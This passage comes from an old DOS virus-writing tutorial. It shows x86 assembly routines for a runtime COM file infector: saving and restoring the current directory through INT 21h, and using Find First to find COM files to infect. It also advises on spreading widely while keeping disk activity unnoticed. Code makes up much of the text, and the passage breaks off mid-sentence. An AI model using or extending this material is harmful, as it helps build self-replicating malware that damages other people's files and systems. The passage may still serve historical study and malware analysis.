from, you must save the old directory and restore it when you're done.  To save
it you must do:

--8<---------------------------------------------------------------------------
Get_Directory:
         mov     ah, 47h
         mov     dl, 0
         lea     si, [bp+offset Orig_Dir]
         int     21h
         jnc     Find_First
         jmp     Return_Control
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      47h     - Get Current Directory
;On entry:      AH      - 47h
;               DL      - Drive number (0=default, 1=A, etc.)
;               DS:SI   - Pointer to a 64-byte buffer
;Returns:       AX      - Error code, if CF is set
;Error codes:   15      - Invalid drive specified
;Notes: This  function returns  the full  pathname  of the  current  directory,
;       excluding  the drive designator and initial backslash character,  as an
;       ASCIIZ string at the memory buffer pointed to by DS:SI.

A 64 byte long buffer must be present to hold the original directory:

--8<---------------------------------------------------------------------------
Orig_Dir        db      64    dup     (?)
---------------------------------------------------------------------------8<--

Then, before actually restoring the old directory,  you must first change  to
the root directory and restore from there,  since the saved path has no leading
backslash and is therefore relative to the root.

--8<---------------------------------------------------------------------------
ChangeTo_Root:
         mov     ah, 3Bh
         lea     dx, [bp+offset Root]
         int     21h
         jc      Restore_DTA
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      3Bh     - Change Directory (CHDIR)
;On entry:      AH      - 3Bh
;               DS:DX   - Pointer  to name of  new  default  directory  (ASCIIZ
;                         string)
;Returns:       AX      - Error code, if CF is set
;Error Codes:   3       - Path not found
;Notes: This function changes the current directory to the directory whose path
;       is specified in the  ASCIIZ string at address DS:DX;  the string length
;       is limited to 64 characters.  The path name may include a drive letter.

A buffer containing an ASCIIZ string representing the root:

--8<---------------------------------------------------------------------------
Root            db      '\', 0
---------------------------------------------------------------------------8<--

And finally you switch to the original directory  (if the original directory is
the root there  will be an error since  the path won't be valid -  this doesn't
matter since we changed to root before):

--8<---------------------------------------------------------------------------
Restore_Directory:
         mov     ah, 3Bh
         lea     dx, [bp+offset Orig_Dir]
         int     21h
         ;jc      Restore_DTA            ;No need, since it's right after
---------------------------------------------------------------------------8<--

If you change drives while searching for files to infect  (this will be covered
in a future article)  you should also preserve the original drive and  restore
it at the end.


File Search Techniques
----------------------
A runtime  virus  can  infect  files  located  in  the  current  directory,  in
subdirectories,  maybe only in root,  in the PATH and even on different drives.
You must  be very careful when writing  your search routine,  since if you only
infect files  in a few places your  virus won't spread much,  but if you search
for files to infect in every possible place, after the first infections it will
start to take much  longer to find new hosts  (since most are already infected)
and disk activity  might last long  enough to be  noticeable.   Some of these
techniques are presented below.   The others will be presented in  a  future
article.


Find First/Find Next
--------------------
This is used  when you want to search for files in the current directory.   You
start by searching for the first matching COM file with normal attributes:

--8<---------------------------------------------------------------------------
Find_First:
         mov     ah, 4Eh
         mov     cx, 0
         lea     dx, [bp+offset COM_Mask]
         int     21h
         jnc     Open_File
         jmp     Return_Control
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      4Eh     - Find First Matching File (FIND FIRST)
;On entry:      AH      - 4Eh
;               CX      - File attribute
;               DS:DX   - Pointer to filespec (ASCIIZ string)
;Returns:       AX      - Error code, if CF is set
;Error codes:   2       - File not found
;               3       - Path not found
;               18      - No more files to be found
;Notes: If CX  is 0,  the function  searches  for  normal  files  only.  If  C